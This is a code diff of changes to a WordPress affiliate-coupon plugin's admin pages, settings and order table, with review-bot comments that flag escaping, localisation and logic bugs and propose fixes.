+ 'style' => array(),
+ 'class' => array()
+ ),
+ 'span' => array(
+ 'class' => array()
+ )
+ );
// Delete
+ // Create actions.
$actions = array(
- 'edit' => sprintf('<a href="%s">%s</a>', admin_url('post.php?post=' . $item->ID . '&action=edit'), esc_html__('Edit', 'woo-coupon-usage')),
- 'delete' => sprintf('<a href="%s" style="color: #7a0707;" onclick="return confirm('%s');">%s</a>', wp_nonce_url(admin_url('admin.php?page=wcusage_coupons&delete_coupon=' . $item->ID), 'delete_coupon'), esc_html__('Are you sure you want to delete this coupon?', 'woo-coupon-usage'), esc_html__('Delete', 'woo-coupon-usage'))
+ 'edit' => sprintf(
+ '<a href="%s">%s</a>',
+ esc_url( admin_url( 'post.php?post=' . $item->ID . '&action=edit' ) ),
+ esc_html__( 'Edit', 'woo-coupon-usage' )
+ ),
+ 'delete' => sprintf(
+ '<a href="%s" onclick="return confirm('%s');" style="color: #7a0707;">%s</a>',
+ esc_url(
+ wp_nonce_url(
+ admin_url( 'admin.php?page=wcusage_coupons&delete_coupon=' . $item->ID ),
+ 'delete_coupon'
+ )
+ ),
+ esc_html__( 'Are you sure you want to delete this coupon?', 'woo-coupon-usage' ),
+ esc_html__( 'Delete', 'woo-coupon-usage' )
+ ),
);
foreach ($actions as $key => $action) {
- $actions[$key] = '<span class="' . $key . '">' . $action . '</span>';
+ $actions[$key] = '<span class="' . esc_attr($key) . '">' . wp_kses($action, $allowed_html) . '</span>';
}
return implode(' | ', $actions);
default:
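Review bot: `$allowed_html` whitelists `onclick` for `<a>`, so `wp_kses()` here will pass through any inline handler and adds no protection over the unfiltered string; drop `onclick` from the allowlist and attach the confirmation via a `data-confirm` attribute plus a small enqueued script, or at least run the message through `esc_js()` rather than `esc_html__()`, since it is interpolated into a JavaScript string literal. As displayed, the single quotes in `onclick="return confirm('%s');"` would also terminate the single-quoted PHP format string unless they are backslash-escaped in the actual source.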
@@ -335,7 +361,8 @@
$coupon_name = $coupon->post_title;
wp_delete_post($coupon_id);
$message = esc_html__('Coupon "'.$coupon_name.'" deleted successfully.', 'woo-coupon-usage');
- echo '<p style="font-weight: bold; color: green;">' . esc_html($message) . '</p>';
+ echo '<p class="notice notice-success is-dismissible" style="padding: 10px; margin: 10px 0;"
+ style="font-weight: bold; color: green;">' . esc_html($message) . '</p>';
}
}
}
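Review bot: the new `<p>` carries two `style` attributes (`style="padding: 10px; margin: 10px 0;"` and `style="font-weight: bold; color: green;"`); browsers keep only the first, so merge them. The context line `esc_html__('Coupon "'.$coupon_name.'" deleted successfully.', ...)` also passes a dynamic string to a translation function, which translation tooling cannot extract; use `sprintf( esc_html__( 'Coupon "%s" deleted successfully.', 'woo-coupon-usage' ), esc_html( $coupon_name ) )`.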
@@ -349,10 +376,10 @@
$page_url_without_affiliate_only = remove_query_arg('affiliate_only', $page_url);
?>
<link rel="stylesheet" href="<?php echo esc_url(WCUSAGE_UNIQUE_PLUGIN_URL) .'fonts/font-awesome/css/all.min.css'; ?>" crossorigin="anonymous">
- <?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>
<div class="wrap">
+ <?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>
<form method="get">
- <h1 class="wcusage-admin-title wcusage-admin-title-coupons">
+ <h1 class="wp-heading-inline wcusage-admin-title wcusage-admin-title-coupons">
<?php echo esc_html__('Coupons', 'woo-coupon-usage'); ?>
<span class="wcusage-admin-title-buttons">
<a href="<?php echo esc_url(admin_url('post-new.php?post_type=shop_coupon')); ?>" class="wcusage-settings-button" id="wcu-admin-create-registration-link">Add Coupon</a>
@@ -361,7 +388,7 @@
<a href="<?php echo esc_url(admin_url('admin.php?page=wcusage-bulk-edit-coupon')); ?>" class="wcusage-settings-button" id="wcu-admin-create-registration-link">Bulk Edit Coupons</a>
</span>
<br/>
- <span class="wcusage-admin-title-filters">
+ <span class="wcusage-admin-title-filters" style="margin-bottom: 10px;">
<input type="hidden" name="page" value="<?php echo esc_html($_REQUEST['page']); ?>" />
<input type="checkbox" name="affiliate_only" value="true" <?php echo $affiliate_only ? 'checked' : ''; ?> onchange="this.form.submit();">
<?php echo esc_html__('Show Affiliate Coupons Only', 'woo-coupon-usage'); ?>
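Review bot: the context line `value="<?php echo esc_html($_REQUEST['page']); ?>"` uses the HTML-text escaper inside an attribute and echoes raw request input; `esc_attr( sanitize_key( wp_unslash( $_REQUEST['page'] ) ) )` behind an `isset()` guard is the right form here.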
--- a/woo-coupon-usage/inc/admin/class-referrals-table.php
+++ b/woo-coupon-usage/inc/admin/class-referrals-table.php
@@ -257,15 +257,15 @@
}
</style>
<link rel="stylesheet" href="<?php echo esc_url(WCUSAGE_UNIQUE_PLUGIN_URL) .'fonts/font-awesome/css/all.min.css'; ?>" crossorigin="anonymous">
- <?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>
<div class="wrap">
- <h2 class="wcusage-admin-title" style="margin-bottom: -15px;">
+ <?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>
+ <h1 class="wcusage-admin-title" style="margin-bottom: -15px;">
<?php echo esc_html__('Affiliate Orders (Referrals)', 'woo-coupon-usage'); ?>
<span class="wcusage-admin-title-buttons">
<a href="<?php echo esc_url(('post-new.php?post_type=shop_order')); ?>" class="wcusage-settings-button" id="wcu-admin-create-registration-link">Add New Order</a>
<a href="<?php echo esc_url(admin_url('admin.php?page=wcusage-bulk-assign-coupons')); ?>" class="wcusage-settings-button" id="wcu-admin-create-registration-link">Assign Orders to Affiliates</a>
</span>
- </h2>
+ </h1>
<br/>
<?php
echo '<form id="referrals-table" method="GET">';
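Review bot: the context line `esc_url(('post-new.php?post_type=shop_order'))` is a relative path without `admin_url()` (note the doubled parentheses), so the "Add New Order" link resolves relative to the current admin page rather than `/wp-admin/`; use `esc_url( admin_url( 'post-new.php?post_type=shop_order' ) )`. The `h2` to `h1` change is fine; the other admin pages in this patch add `wp-heading-inline` to the heading, so consider matching.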
--- a/woo-coupon-usage/inc/admin/settings/admin-options.php
+++ b/woo-coupon-usage/inc/admin/settings/admin-options.php
@@ -832,7 +832,7 @@
?>
<!-- Generate Settings Page Area -->
- <form class="wcusage-settings-form" action="options.php" method="post" style="margin-top: 10px; <?php
+ <form class="wcusage_row_setting wcusage-settings-form" action="options.php" method="post" style="margin-top: 10px; <?php
if ( wcu_fs()->can_use_premium_code() ) {
?>width: 97.5%;<?php
}
@@ -862,7 +862,7 @@
'0px'
);
?>
- <i><?php
+ <i style="margin-top: -5px;"><?php
echo esc_html__( 'This will disable automatic ajax saving, and instead will enable the "Save Settings" button, and you will save all settings at once.', 'woo-coupon-usage' );
?></i>
<br/><br/>
--- a/woo-coupon-usage/inc/admin/settings/options-commission.php
+++ b/woo-coupon-usage/inc/admin/settings/options-commission.php
@@ -21,16 +21,6 @@
<?php echo wcusage_setting_toggle_option('wcusage_field_show_commission', 1, esc_html__( 'Enable Commission Calculations & Statistics', 'woo-coupon-usage' ), '0px'); ?>
<i><?php echo esc_html__( 'When enabled, commission will be calculated and displayed on the affiliate dashboard.', 'woo-coupon-usage' ); ?></i>
- <br/><br/>
-
- <!-- Enable commission calculation statistics -->
- <?php echo wcusage_setting_toggle_option('wcusage_field_commission_disable_non_affiliate', 0, esc_html__( 'Hide commission statistics for non-affiliate coupons.', 'woo-coupon-usage' ), '0px'); ?>
- <i><?php echo esc_html__( 'When enabled, commission statistics are disabled/hidden for coupons that are not assigned to an affiliate user.', 'woo-coupon-usage' ); ?></i>
- <?php if( wcu_fs()->can_use_premium_code() ) { ?>
- <br/>
- <i><?php echo esc_html__( '(PRO) This will also stop "unpaid commission" from being added to non-affiliate coupons.', 'woo-coupon-usage' ); ?></i>
- <?php } ?>
-
<br/><br/><hr/>
<!-- ********** Commission Amounts ********** -->
@@ -148,8 +138,6 @@
<i><?php echo esc_html__( 'Optional: How many days after being assigned as a "lifetime" referral should it expire, and the customer be unlinked from the customer.', 'woo-coupon-usage' ); ?></i><br/>
<i><?php echo esc_html__( 'Set to "0" for permanent lifetime commission with no expiry time.', 'woo-coupon-usage' ); ?> <?php echo esc_html__( 'Can also be set on a per-coupon basis.', 'woo-coupon-usage' ); ?></i><br/>
- <br/>
-
</span>
<!-- Per User Role -->
@@ -195,6 +183,26 @@
</span>
+ <div style="clear: both;"></div>
+
+ <br/><hr/>
+
+ <h3><span class="dashicons dashicons-admin-generic" style="margin-top: 2px;"></span> <?php echo esc_html__( 'Non-Affiliate Coupon Settings', 'woo-coupon-usage' ); ?>:</h3>
+
+ <!-- Disable commission statistics for non-affiliate coupons. -->
+ <?php echo wcusage_setting_toggle_option('wcusage_field_commission_disable_non_affiliate', 0, esc_html__( 'Hide commission statistics for non-affiliate coupons.', 'woo-coupon-usage' ), '0px'); ?>
+ <i><?php echo esc_html__( 'When enabled, commission statistics are disabled/hidden for coupons that are not assigned to an affiliate user.', 'woo-coupon-usage' ); ?></i>
+
+ <?php echo wcusage_setting_toggle('.wcusage_field_commission_disable_non_affiliate', '.wcu-field-section-non-affiliate'); // Show or Hide ?>
+ <span class="wcu-field-section-non-affiliate">
+ <?php if( wcu_fs()->can_use_premium_code() ) { ?>
+ <br/><br/>
+
+ <?php echo wcusage_setting_toggle_option('wcusage_field_commission_disable_non_affiliate_unpaid', 1, esc_html__( 'Stop "unpaid commission" from being earned for non-affiliate coupons.', 'woo-coupon-usage' ), '40px'); ?>
+ <i style="margin-left: 40px;"><?php echo esc_html__( 'When enabled, the unpaid commission will also not be added to non-affiliate coupons.', 'woo-coupon-usage' ); ?></i>
+ <?php } ?>
+ </span>
+
</span>
</div>
@@ -222,14 +230,14 @@
<?php $textaffiliatecommission = esc_html__( 'Affiliate commission', 'woo-coupon-usage' ) . ": "; ?>
<!-- Percentage Amount Of Total Order -->
- <?php echo wcusage_setting_number_option('wcusage_field_affiliate', '0', esc_html__('Percentage Commission (% Of Total Order)', 'woo-coupon-usage'), '0px'); ?>
+ <?php echo wcusage_setting_number_option('wcusage_field_affiliate', '0', esc_html__('Percentage Commission (% Of Total Order)', 'woo-coupon-usage'), '0px', '0.01'); ?>
<br/>
<!-- Fixed Amount Per Order -->
<?php
$fixed_order_label = sprintf(esc_html_x('Fixed Commission (%s - Amount Per Order)', 'woo-coupon-usage'), wcusage_get_currency_symbol());
- echo wcusage_setting_number_option('wcusage_field_affiliate_fixed_order', '0', $fixed_order_label, '0px');
+ echo wcusage_setting_number_option('wcusage_field_affiliate_fixed_order', '0', $fixed_order_label, '0px', '0.01');
?>
<br/>
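Review bot: the new fifth argument '0.01' handed to wcusage_setting_number_option() on both changed lines presumably becomes the input's step attribute, which is browser-side validation only; the save handler must still cast the percentage and fixed amount to float and reject negative values server-side. The function's definition is not in this diff, so confirm its signature has actually gained the parameter and that the default keeps the old behaviour for the callers not updated here.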
@@ -237,7 +245,7 @@
<!-- Fixed Amount Per Product -->
<?php
$fixed_product_label = sprintf(esc_html_x('Fixed Commission (%s - Amount Per Product)', 'woo-coupon-usage'), wcusage_get_currency_symbol());
- echo wcusage_setting_number_option('wcusage_field_affiliate_fixed_product', '0', $fixed_product_label, '0px');
+ echo wcusage_setting_number_option('wcusage_field_affiliate_fixed_product', '0', $fixed_product_label, '0px', '0.01');
?>
<?php
--- a/woo-coupon-usage/inc/admin/settings/options-general.php
+++ b/woo-coupon-usage/inc/admin/settings/options-general.php
@@ -389,7 +389,12 @@
<br/>
<!-- Show shipping costs. -->
- <?php echo wcusage_setting_toggle_option('wcusage_field_show_shipping', 0, esc_html__( 'Show shipping costs.', 'woo-coupon-usage' ), '0px'); ?>
+ <?php echo wcusage_setting_toggle_option('wcusage_field_show_shipping', 0, esc_html__( 'Show "shipping" costs column.', 'woo-coupon-usage' ), '0px'); ?>
+
+ <br/>
+
+ <!-- Show tax costs. -->
+ <?php echo wcusage_setting_toggle_option('wcusage_field_show_order_tax', 0, esc_html__( 'Show order "tax" column.', 'woo-coupon-usage' ), '0px'); ?>
<br/>
@@ -564,6 +569,15 @@
<br/>
<p>
+ <?php echo wcusage_setting_toggle_option('wcusage_field_rates_show_all_variations', 0, esc_html__( 'Show All Product Variations', 'woo-coupon-usage' ), '40px'); ?>
+ <i style="margin-left: 40px;"><?php echo esc_html__( 'If enabled, all variations of a product will be shown in the table as seperate rows.', 'woo-coupon-usage' ); ?></i>
+ <br/>
+ <i style="margin-left: 40px;"><?php echo esc_html__( 'If disabled, only the parent product will be shown - and variations that have per-variation commission rates set different to the parent.', 'woo-coupon-usage' ); ?></i>
+ </p>
+
+ <br/>
+
+ <p>
<?php echo wcusage_setting_toggle_option('wcusage_field_rates_show_search', 1, esc_html__( 'Show Search Field', 'woo-coupon-usage' ), '40px'); ?>
</p>
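Review bot: "seperate" in the translatable string on the first added `<i>` line is a typo; change it to "separate" before this ships, because correcting the msgid later invalidates every existing translation of that string.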
@@ -910,7 +924,7 @@
} else {
$name = 'wcusage_field_order_type_custom['.$key.']';
}
- echo '<span style="margin-right: 20px;'.esc_attr($extrastyles).'" id="'.esc_attr($thisid).'">
+ echo '<span style="display: inline-block; margin: 10px 20px 10px 0;'.esc_attr($extrastyles).'" id="'.esc_attr($thisid).'">
<input type="checkbox"
style="'.esc_attr($extrastyles).'" checktype="multi"
class="order-status-checkbox-'.esc_attr($key).'"
@@ -932,19 +946,21 @@
<div class="setup-hide">
- <br/>
+ <?php $wcusage_field_order_sort = wcusage_get_setting_value('wcusage_field_order_sort', 'paiddate'); ?>
+ <?php if( $wcusage_field_order_sort != "completeddate" ) { ?>
+ <br/>
<p><strong><?php echo esc_html__( 'Advanced Orders Settings', 'woo-coupon-usage' ); ?>:</strong>
<button type="button" class="wcu-showhide-button" id="wcu_show_orders_advanced">Show <span class="fa-solid fa-arrow-down"></span></button></p>
<?php echo wcu_admin_settings_showhide_toggle("wcu_show_orders_advanced", "wcu_orders_advanced", "Show", "Hide"); ?>
<div id="wcu_orders_advanced" style="display: none;">
+ <?php } ?>
<br/>
<!-- How to sort orders -->
<p>
- <?php $wcusage_field_order_sort = wcusage_get_setting_value('wcusage_field_order_sort', 'paiddate'); ?>
<input type="hidden" value="0" id="wcusage_field_order_sort" data-custom="custom" name="wcusage_options[wcusage_field_order_sort]" >
<style>
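Review bot: the opening `<div id="wcu_orders_advanced" style="display: none;">` is now emitted only when `$wcusage_field_order_sort != "completeddate"`, and the matching `</div>` in the later hunk of this file (@@ -982) is wrapped in a second copy of the same comparison. Evaluate it once into a boolean such as `$show_advanced_wrapper` and use that at both ends so the two checks cannot drift apart; a one-line comment explaining why the collapsible wrapper disappears for the "completeddate" sort would also help the next reader, since the heading and Show/Hide button vanish with it.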
@@ -972,7 +988,7 @@
</script>
<strong><label for="scales"><?php echo esc_html__( 'By which date should orders be sorted on the affiliate dashboard?', 'woo-coupon-usage' ); ?></label></strong><br/>
<select name="wcusage_options[wcusage_field_order_sort]" id="wcusage_field_order_sort" onchange="check_order_sort_dropdown()">
- <option class="wcusage_field_order_sort_option" value="paiddate" <?php if($wcusage_field_order_sort == "paiddate") { ?>selected<?php } ?>><?php echo esc_html__( 'Created Date', 'woo-coupon-usage' ); ?></option>
+ <option class="wcusage_field_order_sort_option" value="paiddate" <?php if($wcusage_field_order_sort == "paiddate") { ?>selected<?php } ?>><?php echo esc_html__( 'Created Date (Recommended)', 'woo-coupon-usage' ); ?></option>
<option class="wcusage_field_order_sort_option" value="completeddate" <?php if($wcusage_field_order_sort == "completeddate") { ?>selected<?php } ?>><?php echo esc_html__( 'Completed Date', 'woo-coupon-usage' ); ?></option>
</select>
<br/><i><?php echo esc_html__( 'This will determine how the orders are sorted on the affiliate dashboard, either by the day they were paid for, or the day it was set to completed.', 'woo-coupon-usage' ); ?></i>
@@ -982,10 +998,13 @@
<?php echo esc_html__( 'NOTE: If set to "Completed Date", only orders that have been marked as "completed" (at-least once) can be displayed on the dashboard.', 'woo-coupon-usage' ); ?>
<br/>
<?php echo esc_html__( 'This may therefore disregard some of the order statuses that are checked above.', 'woo-coupon-usage' ); ?>
+ <?php echo esc_html__( 'Ideally you should only enable "completed" order statuses above if you have "Completed Date" selected.', 'woo-coupon-usage' ); ?>
</i>
</span>
+ <?php if( $wcusage_field_order_sort != "completeddate" ) { ?>
</div>
+ <?php } ?>
</div>
--- a/woo-coupon-usage/inc/admin/settings/options-notifications.php
+++ b/woo-coupon-usage/inc/admin/settings/options-notifications.php
@@ -524,7 +524,10 @@
<?php echo wcusage_setting_text_option('wcusage_field_registration_admin_email', get_bloginfo( 'admin_email' ), esc_html__( 'Email address for recieving admin notifications:', 'woo-coupon-usage' ), '0px'); ?>
<i><?php echo esc_html__( 'This is the email address that will recieve admin notifications such as new affiliate registrations, and payout notifications.', 'woo-coupon-usage' ); ?></i>
- <br/>
+ <br/><br/>
+
+ <!-- Enable New Order Info -->
+ <?php echo wcusage_setting_toggle_option('wcusage_field_new_order_info', 1, esc_html__( 'Enable "Affiliate Information" section in the admin "New Order" email.', 'woo-coupon-usage' ), '0px'); ?>
<br/>
<hr style="margin-bottom: 35px;"/>
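Review bot: the two unchanged label strings directly above the new toggle still read "recieving" and "recieve"; since this hunk already edits the block, correct them to "receiving" / "receive". The new `wcusage_field_new_order_info` toggle defaults to 1, which matches the default read back in new-order-email.php later in this diff, so the two stay consistent.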
--- a/woo-coupon-usage/inc/admin/tools/admin-bulk-edit-coupons.php
+++ b/woo-coupon-usage/inc/admin/tools/admin-bulk-edit-coupons.php
@@ -74,8 +74,8 @@
<?php echo do_action('wcusage_hook_dashboard_page_header', ''); ?>
<div class="wrap wcusage-bulk-edit-coupons wcusage-tools">
- <h2><?php echo esc_html__('Bulk Edit: Coupon Settings', 'your-text-domain'); ?></h2>
- <p><?php echo esc_html__('Use this tool to bulk edit your coupon settings.', 'your-text-domain'); ?></p>
+ <h2><?php echo esc_html__('Bulk Edit: Coupon Settings', 'woo-coupon-usage'); ?></h2>
+ <p><?php echo esc_html__('Use this tool to bulk edit your coupon settings.', 'woo-coupon-usage'); ?></p>
<br/>
<button id="import-csv" class="button">Import CSV</button>
<button id="export-csv" class="button">Export CSV</button>
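Review bot: the "Import CSV" and "Export CSV" button labels two lines below the corrected headings are still hard-coded English; wrap them in `esc_html__( ..., 'woo-coupon-usage' )` as well, since this hunk's purpose is fixing localisation in this file (the same two buttons appear in admin-bulk-edit-products.php below).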
@@ -86,15 +86,15 @@
<div class="wcu-scrollable-table">
<table id="wcusage-tools-rows">
<tr>
- <th><?php echo esc_html__('Coupon ID', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Coupon Name', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Discount Type', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Discount Amount', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Affiliate Username', 'your-text-domain'); ?></th>
+ <th><?php echo esc_html__('Coupon ID', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Coupon Name', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Discount Type', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Discount Amount', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Affiliate Username', 'woo-coupon-usage'); ?></th>
<?php if (wcu_fs()->can_use_premium_code()) { ?>
- <th><?php echo esc_html__('Commission Percent', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Commission £ - Order', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Commission £ - Product', 'your-text-domain'); ?></th>
+ <th><?php echo esc_html__('Commission Percent', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Commission £ - Order', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Commission £ - Product', 'woo-coupon-usage'); ?></th>
<?php } ?>
</tr>
<?php wcusage_bulk_coupon_fields(); ?>
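Review bot: "Commission £ - Order" and "Commission £ - Product" hard-code a pound sign in the header cells, while the options-affiliates hunk above builds the equivalent labels with `sprintf( esc_html_x( 'Fixed Commission (%s - Amount Per Order)', ... ), wcusage_get_currency_symbol() )`; use the same pattern here so stores in other currencies see the right symbol and the strings stay translatable.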
--- a/woo-coupon-usage/inc/admin/tools/admin-bulk-edit-products.php
+++ b/woo-coupon-usage/inc/admin/tools/admin-bulk-edit-products.php
@@ -49,9 +49,9 @@
<?php echo do_action('wcusage_hook_dashboard_page_header', ''); ?>
<div class="wrap wcusage-bulk-edit-products wcusage-tools">
- <h2><?php echo esc_html__('Bulk Edit: Product Settings', 'your-text-domain'); ?></h2>
- <p><?php echo esc_html__('Use this tool to bulk edit your per-product commission settings. The username must exist or it will not be updated.', 'your-text-domain'); ?></p>
- <p><?php echo esc_html__('Currently "Per-Affiliate Product Commission Rates" can only be edited by viewing/editing the individual product.', 'your-text-domain'); ?></p>
+ <h2><?php echo esc_html__('Bulk Edit: Product Settings', 'woo-coupon-usage'); ?></h2>
+ <p><?php echo esc_html__('Use this tool to bulk edit your per-product commission settings. The username must exist or it will not be updated.', 'woo-coupon-usage'); ?></p>
+ <p><?php echo esc_html__('Currently "Per-Affiliate Product Commission Rates" can only be edited by viewing/editing the individual product.', 'woo-coupon-usage'); ?></p>
<br/>
<button id="import-csv" class="button">Import CSV</button>
<button id="export-csv" class="button">Export CSV</button>
@@ -62,10 +62,10 @@
<div class="wcu-scrollable-table">
<table id="wcusage-tools-rows">
<tr>
- <th><?php echo esc_html__('Product ID', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Product Name', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Commission Percent', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Commission Fixed', 'your-text-domain'); ?></th>
+ <th><?php echo esc_html__('Product ID', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Product Name', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Commission Percent', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Commission Fixed', 'woo-coupon-usage'); ?></th>
</tr>
<?php wcusage_bulk_product_fields(); ?>
</table>
--- a/woo-coupon-usage/inc/admin/tools/admin-bulk-product-rates.php
+++ b/woo-coupon-usage/inc/admin/tools/admin-bulk-product-rates.php
@@ -43,9 +43,9 @@
?>
<?php echo do_action('wcusage_hook_dashboard_page_header', ''); ?>
<div class="wrap wcusage-tools">
- <h2><?php echo esc_html__('Bulk Assign: Per-Affiliate Product Rates', 'your-text-domain'); ?></h2>
+ <h2><?php echo esc_html__('Bulk Assign: Per-Affiliate Product Rates', 'woo-coupon-usage'); ?></h2>
<p></p>
- <p><?php echo esc_html__('Bulk assign per-product commission rates, on a per-affiliate basis. Any existing rates will also be updated.', 'your-text-domain'); ?></p>
+ <p><?php echo esc_html__('Bulk assign per-product commission rates, on a per-affiliate basis. Any existing rates will also be updated.', 'woo-coupon-usage'); ?></p>
<form id="bulk-assign-coupon-form" method="POST">
<input type="hidden" name="action" value="assign_rates">
<input type="hidden" name="_wpnonce" value="<?php echo esc_html($nonce); ?>">
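Review bot: the unchanged `value="<?php echo esc_html($nonce); ?>"` on the hidden `_wpnonce` input uses the HTML-text escaper for a value that sits in an attribute; use `esc_attr( $nonce )`. A nonce is alphanumeric so nothing is exploitable here, but the wrong escaper in an attribute context is exactly the pattern that gets copied into places where the value is user-controlled.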
@@ -53,11 +53,11 @@
<div class="wcu-scrollable-table">
<table id="wcusage-tools-rows" style="margin: 0;">
<tr style="text-align: left;">
- <th><?php echo esc_html__('Product ID', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Type', 'your-text-domain'); ?></th>
- <th class='the-type'><?php echo esc_html__('Affiliate', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Percent', 'your-text-domain'); ?></th>
- <th><?php echo esc_html__('Fixed', 'your-text-domain'); ?></th>
+ <th><?php echo esc_html__('Product ID', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Type', 'woo-coupon-usage'); ?></th>
+ <th class='the-type'><?php echo esc_html__('Affiliate', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Percent', 'woo-coupon-usage'); ?></th>
+ <th><?php echo esc_html__('Fixed', 'woo-coupon-usage'); ?></th>
</tr>
<?php wcusage_bulk_assign_rates_fields(); ?>
</table>
--- a/woo-coupon-usage/inc/dashboard/tab-latest-orders.php
+++ b/woo-coupon-usage/inc/dashboard/tab-latest-orders.php
@@ -65,6 +65,7 @@
$option_show_amount = wcusage_get_setting_value( 'wcusage_field_amount', '1' );
$option_show_amount_saved = wcusage_get_setting_value( 'wcusage_field_amount_saved', '1' );
$option_show_shipping = wcusage_get_setting_value( 'wcusage_field_show_shipping', '0' );
+ $option_show_tax = wcusage_get_setting_value( 'wcusage_field_show_order_tax', '0' );
$option_show_list_products = wcusage_get_setting_value( 'wcusage_field_list_products', '1' );
$wcusage_show_commission = wcusage_get_setting_value( 'wcusage_field_show_commission', '1' );
$isordersstartset = false;
@@ -72,7 +73,7 @@
global $woocommerce;
$c = new WC_Coupon($coupon_code);
$the_coupon_usage = $c->get_usage_count();
- $wcusage_page_load = wcusage_get_setting_value( 'wcusage_field_page_load', '' );
+ $wcusaFge_page_load = wcusage_get_setting_value( 'wcusage_field_page_load', '' );
//if($the_coupon_usage > 5000) { $wcusage_page_load = 1; }
/**/
$wcusage_field_load_ajax = wcusage_get_setting_value( 'wcusage_field_load_ajax', '1' );
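Review bot: the renamed `$wcusaFge_page_load` on the changed line is a typo that silently breaks behaviour: every later read of `$wcusage_page_load` in this file now sees an undefined variable (null, so the page-load mode can never be enabled) and PHP logs a warning on each dashboard render. Revert the assignment to `$wcusage_page_load`.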
@@ -178,6 +179,7 @@
$option_show_amount = wcusage_get_setting_value( 'wcusage_field_amount', '1' );
$option_show_amount_saved = wcusage_get_setting_value( 'wcusage_field_amount_saved', '1' );
$option_show_shipping = wcusage_get_setting_value( 'wcusage_field_show_shipping', '0' );
+ $option_show_tax = wcusage_get_setting_value( 'wcusage_field_show_order_tax', '0' );
$option_show_list_products = wcusage_get_setting_value( 'wcusage_field_list_products', '1' );
$wcusage_show_commission = wcusage_get_setting_value( 'wcusage_field_show_commission', '1' );
// Check if disable non affiliate commission
@@ -360,6 +362,19 @@
?>
<?php
+ if ( $option_show_tax ) {
+ ?>
+ .wcu-table-recent-orders td:nth-of-type(<?php
+ echo esc_html( $wcusage_ro_label_count );
+ ?>):before { content: "Tax"; }
+ <?php
+ $wcusage_ro_label_count++;
+ ?>
+ <?php
+ }
+ ?>
+
+ <?php
if ( $option_show_ordercountry ) {
?>
.wcu-table-recent-orders td:nth-of-type(<?php
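Review bot: the responsive-table label `content: "Tax";` in the added CSS block is a literal, while the matching header cell added later in this file uses `esc_html__( 'Tax', 'woo-coupon-usage' )`; emit the translated string here too, escaped for the CSS string context it is printed into, so the mobile layout is localised like the rest of the table.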
@@ -507,6 +522,16 @@
?>
<?php
+ if ( $option_show_tax ) {
+ ?>
+ <th class='wcuTableHead'><?php
+ echo esc_html__( 'Tax', 'woo-coupon-usage' );
+ ?></th>
+ <?php
+ }
+ ?>
+
+ <?php
if ( $orders['total_commission'] > 0 && $wcusage_show_commission ) {
?>
<th class='wcuTableHead'>
@@ -676,9 +701,10 @@
if ( $wcusage_field_order_sort != "completeddate" ) {
$showdate = $order_date;
$showtime = get_the_time( 'U', $orderid );
+ $showtime = date_i18n( "g:i a", $showtime );
} else {
$showdate = $completed_date;
- $showtime = strtotime( $completed_date );
+ $showtime = strtotime( $orderinfo->get_date_completed() );
$showtime = date_i18n( "g:i a", $showtime );
}
$wcusage_show_tax = wcusage_get_setting_value( 'wcusage_field_show_tax', '0' );
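Review bot: `strtotime( $orderinfo->get_date_completed() )` on the changed line depends on WC_DateTime's `__toString()` and returns false when the order has no completion date (null), after which `date_i18n()` falls back to the current time and the row shows "now". Guard the null case and take the timestamp directly: `$completed = $orderinfo->get_date_completed();` then `$showtime = $completed ? date_i18n( 'g:i a', $completed->getTimestamp() ) : '';`. Pre-formatting `$showtime` in the first branch is consistent with the later hunk that drops the `date_i18n()` call at output time, so both branches must keep returning a string.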
@@ -802,7 +828,7 @@
// Time
if ( $option_show_time ) {
echo "<td class='wcuTableCell'>";
- echo "<span>" . esc_html( date_i18n( 'g:i a', $showtime ) ) . "</span>";
+ echo "<span>" . esc_html( $showtime ) . "</span>";
echo "</td>";
}
// Status
@@ -840,6 +866,12 @@
''
) ) . "</td>";
}
+ // Tax
+ if ( $option_show_tax != "0" ) {
+ echo "<td class='wcuTableCell'> " . wcusage_format_price( $orderinfo->get_total_tax() ) . "</td>";
+ $col7 = true;
+ }
+ // Commission
if ( $orders['total_commission'] > 0 && $wcusage_show_commission ) {
echo "<td class='wcuTableCell'> ";
if ( $type == "mla" ) {
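Review bot: the added tax cell echoes `wcusage_format_price( $orderinfo->get_total_tax() )` unescaped, and its guard `$option_show_tax != "0"` differs from the `if ( $option_show_tax )` form used for the same option in the CSS and header hunks above; pick one form. If `wcusage_format_price()` returns plain text, wrap it in `esc_html()`; if it returns markup like `wc_price()` does, use `wp_kses_post()`. The bare `$col7 = true;` also needs a comment saying what the flag controls.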
@@ -905,7 +937,7 @@
}
/* Show the "MORE" products list column / toggle on table */
if ( $option_show_list_products == "1" ) {
- if ( $orderinfo->get_items() ) {
+ if ( $orderinfo->get_items() && $orderinfo->get_status() != "refunded" ) {
echo "<td class='wcuTableCell excludeThisClass orderproductstd orderproductstd" . esc_attr( $random ) . "-" . esc_html( $orderid ) . "' style='min-width: 100px; font-size: 16px;'>";
echo "<a class='listproductsbutton' href='javascript:void(0);' id='listproductsbutton-" . esc_attr( $random ) . "-" . esc_html( $orderid ) . "'>" . esc_html__( "MORE", "woo-coupon-usage" ) . " <i class='fas fa-chevron-down'></i> <i class='fas fa-chevron-up' style='display: none;'></i></i></i></a>";
} else {
